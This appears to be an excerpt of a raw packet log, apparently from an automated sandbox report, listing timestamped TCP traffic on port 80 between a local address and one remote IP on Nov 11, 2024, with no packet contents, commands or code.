                                                                                                                                                Nov 11, 2024 19:16:48.076252937 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076271057 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076301098 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076905966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076919079 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076936007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076950073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076962948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076971054 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076975107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076996088 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.077020884 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.078658104 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.078789949 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.078840017 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.078933001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079087973 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079149008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.079220057 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079233885 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079273939 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081042051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081062078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081073999 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081085920 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081096888 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081110001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081120014 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081123114 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081135988 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081202030 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081202984 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081207037 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081219912 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081233025 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081252098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081257105 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081264973 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081295967 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081367970 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081386089 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081398964 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081409931 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081442118 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082231045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082243919 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082253933 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082266092 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082278967 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082277060 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082290888 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082309008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082339048 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.083069086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083081961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083093882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083164930 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.083225965 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083240032 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083262920 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084064960 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084078074 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084088087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084100962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084110975 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084112883 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084125996 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084136963 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084194899 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084728003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084741116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084752083 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084764004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084770918 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084775925 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084800959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084830046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085536957 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085555077 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085609913 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085715055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085726976 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085740089 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085745096 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085767984 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085814953 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086388111 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086401939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086441040 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086575985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086590052 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086601019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086611986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086626053 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086654902 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.087379932 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087393045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087404966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087435007 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.130229950 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.138067007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138147116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138159990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138431072 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.186655045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186745882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186758041 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186872959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187107086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187119007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187129974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187143087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187160969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187180996 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187731981 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187743902 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187755108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187767029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187786102 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187789917 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187817097 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187846899 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.188606977 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188618898 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188630104 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188641071 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188652992 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188664913 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.188669920 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.188702106 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.188720942 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.189553976 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.189565897 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.189577103 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.189589977 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.189605951 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.189646959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.189646959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.190326929 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190345049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190356970 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190365076 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.190370083 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190382004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190391064 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.190397978 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.190428019 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.191224098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.191236019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.191246986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.191260099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.191267014 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.191276073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.191297054 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.191358089 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.192142963 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192156076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192171097 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192183018 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192194939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192207098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192219973 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.192250013 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.192955971 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192967892 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192979097 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.192991018 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193001986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193027973 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.193061113 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.193772078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193784952 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193794966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193806887 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193818092 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193820953 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.193830967 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.193845987 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.193872929 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.194643974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194657087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194670916 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194684029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194691896 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.194694996 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194706917 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.194735050 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.195359945 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195373058 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195383072 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195394993 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195400000 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.195411921 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195424080 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195436001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195447922 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.195728064 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.195765972 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.196332932 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196346045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196356058 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196367979 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196378946 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196386099 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.196393967 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196407080 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196410894 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.196422100 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.196434975 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.196460009 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.197356939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197369099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197381020 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197391987 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197406054 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197415113 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.197416067 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.197417974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197429895 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197443962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.197448969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.197472095 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.198266983 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198280096 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198292017 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198306084 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198313951 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.198318005 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198333025 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.198338032 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198350906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198364019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.198374033 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.198394060 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.199206114 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199219942 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199251890 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.199438095 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199450016 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199460983 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199471951 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199489117 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.199495077 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199505091 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.199511051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199525118 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199532986 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.199537039 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.199563980 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.200485945 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200499058 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200514078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200525999 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200534105 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.200539112 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200553894 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200565100 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.200562954 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.200586081 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.200622082 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.201596975 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201610088 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201621056 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201632977 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201644897 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201658010 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201669931 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201679945 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.201682091 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.201721907 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.202452898 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202466011 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202481031 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202493906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202506065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202519894 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202528000 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.202533007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202547073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.202553034 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.202605009 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.203363895 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203376055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203387022 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203398943 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203404903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203412056 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203421116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203435898 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.203444958 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.203444958 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.203532934 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.204240084 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204252958 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204263926 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204279900 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204293013 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204303980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204315901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204324007 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.204356909 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205056906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205070019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205080986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205092907 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205125093 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205125093 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205468893 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205482006 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205497026 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205507994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205517054 CET4973180192.168.2.492.114.2.230
